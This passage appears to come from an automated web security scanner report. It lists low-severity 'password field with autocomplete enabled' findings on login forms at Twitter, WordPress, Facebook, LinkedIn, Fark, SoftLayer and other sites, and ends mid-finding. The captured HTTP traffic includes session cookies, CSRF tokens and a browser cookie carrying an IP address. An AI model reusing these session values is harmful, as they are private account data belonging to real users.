Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 13:56:47 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 14534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

8. Password field with autocomplete enabled

There are 31 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


8.1. http://twitter.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309951242-13485-35848
ETag: "f6755023a327c6a2088b2fbeac26c125"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:20:42 GMT
X-Runtime: 0.01159
Content-Type: text/html; charset=utf-8
Content-Length: 50119
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: dcf60bc401b809082ca7be8e145145d313a72168
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UwN2EzMmM4Zjk4ZGJjYjE0ZTM0YTQ1YzQzMmQz%250AYTU6D2NyZWF0ZWRfYXRsKwgM4Sj%252FMAEiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiVkNDQ5%250ANTQwNjk5YTQ4ZDU0NjNlZjhmNDNiYWM3MjQyNQ%253D%253D--5d4a05ccb95564ae2061eeaf406e3ab4f4a78a92; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
<div id="signin-dropdown" class="dropdown dark">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
</span>
<input type="password" value="" name="session[password]" />
</label>
...[SNIP]...

8.2. http://twitter.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309951242-13485-35848
ETag: "f6755023a327c6a2088b2fbeac26c125"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:20:42 GMT
X-Runtime: 0.01159
Content-Type: text/html; charset=utf-8
Content-Length: 50119
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: dcf60bc401b809082ca7be8e145145d313a72168
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UwN2EzMmM4Zjk4ZGJjYjE0ZTM0YTQ1YzQzMmQz%250AYTU6D2NyZWF0ZWRfYXRsKwgM4Sj%252FMAEiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiVkNDQ5%250ANTQwNjk5YTQ4ZDU0NjNlZjhmNDNiYWM3MjQyNQ%253D%253D--5d4a05ccb95564ae2061eeaf406e3ab4f4a78a92; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
<div class="front-signin">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="session[password]" title="Password" />
<span class="holder">
...[SNIP]...

8.3. http://twitter.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309951242-13485-35848
ETag: "f6755023a327c6a2088b2fbeac26c125"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:20:42 GMT
X-Runtime: 0.01159
Content-Type: text/html; charset=utf-8
Content-Length: 50119
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: dcf60bc401b809082ca7be8e145145d313a72168
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UwN2EzMmM4Zjk4ZGJjYjE0ZTM0YTQ1YzQzMmQz%250AYTU6D2NyZWF0ZWRfYXRsKwgM4Sj%252FMAEiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiVkNDQ5%250ANTQwNjk5YTQ4ZDU0NjNlZjhmNDNiYWM3MjQyNQ%253D%253D--5d4a05ccb95564ae2061eeaf406e3ab4f4a78a92; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
</h3>
<form action="https://twitter.com/signup" class="signup signup-btn" method="post">
<div class="holding name">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="user[user_password]"/>
<span class="holder">
...[SNIP]...

8.4. http://twitter.com/intent/session

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /intent/session

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /intent/session?return_to=%2Fintent%2Ftweet%3Fsource%3Dwebclient%26text%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx&source=webclient&text=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: js=1; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; k=173.193.214.243.1309445969207029; guest_id=v1%3A13086187569807267; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--68bfb23ecb75192721faa31141f4cc93644031bd

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309950927-60253-54088
ETag: "36b99243bfb315e43cf77ffb34f0123a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:15:27 GMT
X-Runtime: 0.01137
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8d1959539e4fb4977e5ce9becc49dc0a878abe53
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1Ogxjc3JmX2lkIiUzZTA3YTMyYzhmOThkYmNi%250AMTRlMzRhNDVjNDMyZDNhNSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--14f6b43e796db4ce15e8d70d84d63b17d3a42eef; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 4344
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width; initial-scale=1.0;
...[SNIP]...
<div id="bd" role="main">

<form action="/intent/session" id="login-form" method="post"><div style="margin:0;padding:0">
...[SNIP]...
</label>
<input aria-required="true" class="password" id="password" name="session[password]" required="required" type="password" value="" />
</div>
...[SNIP]...

8.5. https://wordpress.com/wp-login.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://wordpress.com
Path:   /wp-login.php

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /wp-login.php HTTP/1.1
Host: wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Jul 2011 11:21:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: hiab=on; path=/; domain=.wordpress.com
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.wordpress.com
Content-Length: 3666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <meta
...[SNIP]...
</h1>

<form name="loginform" id="loginform" action="https://wordpress.com/wp-login.php" method="post">
   <p>
...[SNIP]...
<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

8.6. http://www.bebo.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.bebo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 26956
Date: Wed, 06 Jul 2011 11:21:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</h2>
   
       <form id="login-form" action="https://secure.bebo.com/SignIn.jsp" method="post">
   <table cellpadding="0" cellspacing="0" border="0">
...[SNIP]...
<td>
       <input type="password" class="text-input" name="Password" style="display:none;" />
       <input type="text" class="text-input password-text inactive" value="Password" tabindex="2" />
...[SNIP]...

8.7. https://www.drtserver.com/microsoft/1/login.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.drtserver.com
Path:   /microsoft/1/login.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /microsoft/1/login.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.drtserver.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Thu, 07 Jul 2011 13:27:09 GMT
Server: Apache/2.2.16 (Unix)
Location: https://www.microsoftaffiliates.com/index.html?content=Microsoft
X-Server-Name: www@dc1dtweb59
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17547

<html>
<script language="JavaScript">
<!--
function medopen() {
   coolopenWindow=window.open("/flash/mediakit.html","medopen","scrollbars=0,menubar=0,statusbar=0,toolbar=0,height=560,width=362,out
...[SNIP]...
<td class="login">
   
<form method="POST" action="https://www.microsoftaffiliates.com/" style="margin:0; padding:0 0 0 40px;">

Email / Affiliate ID:&nbsp;&nbsp;
<input name="DL_AUTH_USERNAME" type="text" class="login-text">

&nbsp;&nbsp;Password:&nbsp;&nbsp;
<input name="DL_AUTH_PASSWORD" type="password" class="login-text">
<input type="hidden" name="next" value="/">
...[SNIP]...

8.8. http://www.evernote.com/clip.action

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.evernote.com
Path:   /clip.action

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /clip.action?url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US HTTP/1.1
Host: www.evernote.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: shard=deleteme; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cookieTestValue=1309951281866; Version=1; Max-Age=378432000; Expires=Mon, 03-Jul-2023 11:21:21 GMT; Path=/
Set-Cookie: JSESSIONID=533B63D3D80594249497C75E3B0979D4; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Wed, 06 Jul 2011 11:21:21 GMT
Connection: close
Server: Evernote/1.0
Content-Length: 8523


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!
...[SNIP]...
</h2>

<form id="login_form" name="login_form" action="https://www.evernote.com/Login.action" method="post">

<table width="100%" border="0" cellspacing="0"
cellpadding="0" summary="Sign in form">
...[SNIP]...
<td><input id="password" maxlength="64" style="width: 170px" name="password" class="text" type="password" /></td>
...[SNIP]...

8.9. http://www.facebook.com/2008/fbml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.213.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Length: 11639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

8.10. http://www.fark.com/cgi/farkit.pl

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fark.com
Path:   /cgi/farkit.pl

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /cgi/farkit.pl HTTP/1.1
Host: www.fark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Server: Apache
P3P: CP="CAO PSA OUR"
Set-Cookie: FarkUser=v7aH50e9gtrYYySpXPTIo-nBHGZ9nVB94SwKRg1VwhFj-9-YQL5BzG0ppgaq3-8tel444UtsZSFScvB7a-XxADQaRnWCK; Domain=.fark.com; Expires=Sat, 30-Jun-2012 14:07:35 GMT; Max-Age=31104000; Path=/; Version=1; HttpOnly
Expires: Wed, 06 Jul 2011 14:07:35 GMT
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate
Content-Length: 36547

<!doctype html>
<!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->
<!--[if lt IE 7 ]> <html class="no-js ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-j
...[SNIP]...
<div id="loginBoxesNoScript">
    <form method="post" enctype="application/x-www-form-urlencoded" action="https://www.fark.com/login">
            <div class="loginSectionNoScript submitLogin">
...[SNIP]...
</label>
               <input type="password" name="passwd" id="loginPass_ns">
           </div>
...[SNIP]...

8.11. http://www.fark.com/cgi/farkit.pl

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fark.com
Path:   /cgi/farkit.pl

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /cgi/farkit.pl HTTP/1.1
Host: www.fark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Server: Apache
P3P: CP="CAO PSA OUR"
Set-Cookie: FarkUser=v7aH50e9gtrYYySpXPTIo-nBHGZ9nVB94SwKRg1VwhFj-9-YQL5BzG0ppgaq3-8tel444UtsZSFScvB7a-XxADQaRnWCK; Domain=.fark.com; Expires=Sat, 30-Jun-2012 14:07:35 GMT; Max-Age=31104000; Path=/; Version=1; HttpOnly
Expires: Wed, 06 Jul 2011 14:07:35 GMT
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate
Content-Length: 36547

<!doctype html>
<!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->
<!--[if lt IE 7 ]> <html class="no-js ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-j
...[SNIP]...
</div> <form method="post" enctype="application/x-www-form-urlencoded" action="https://www.fark.com/login">
    <input type="hidden" name="continue" value="H50d9o3tJw4Di1Vou0rBz5DiSq8C6Zs8GiiKMvpAs3OeTKywEi5C7gLgEa-8vEJj0gReKvR_u-tIqEKD">
...[SNIP]...
</label>
<input type="password" name="passwd" id="loginPass">
</div>
...[SNIP]...

8.12. http://www.linkedin.com/shareArticle

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /shareArticle

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /shareArticle HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:93DIfn6pEjjvFpbrPCwqLaeaMjj-1DOra9DURRE1_gdw92SrsI2wg9:1309951282:71f9fdf64b90fac7cb9339589e3ed534ca703d1e"; Version=1; Max-Age=1799; Expires=Wed, 06-Jul-2011 11:51:21 GMT; Path=/
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:1274968938822400364"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: bcookie="v=1&96d058ca-285d-4b2d-96c8-f61d525270fc"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 11:21:21 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a42198c;expires=Wed, 06-Jul-2011 11:53:13 GMT;path=/;httponly
Content-Length: 8493

<!DOCTYPE html>
<html lang="en">
<head>


<script type="text/jav
...[SNIP]...
</a>


<form action="https://www.linkedin.com/secure/login" method="POST" accept-charset="UTF-8" name="login"> <input type="hidden" name="csrfToken" value="ajax:1274968938822400364">
...[SNIP]...
<div class="elem">
<input type="password" name="session_password" value="" id="session_password-login" class="inpt">
</div>
...[SNIP]...

8.13. http://www.sipc.org/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</td>
<form name="login" method="post" action="claim/module/login.cfm" target="_blank" onSubmit = "return checkForm(this);"><td width="95" bgcolor="#CBD4CB">
...[SNIP]...
</div>
<input type="Password" name="password" style="width:90px;">
<div style="padding-top:8px;">
...[SNIP]...

8.14. http://www.softlayer.com/about/analyst-relations/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/analyst-relations/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /about/analyst-relations/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 22617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.15. http://www.softlayer.com/about/careers/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/careers/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /about/careers/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.16. http://www.softlayer.com/about/contact-us/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/contact-us/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /about/contact-us/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:16 GMT
Connection: close
Content-Type: text/html
Content-Length: 26084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.17. http://www.softlayer.com/about/feedback

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
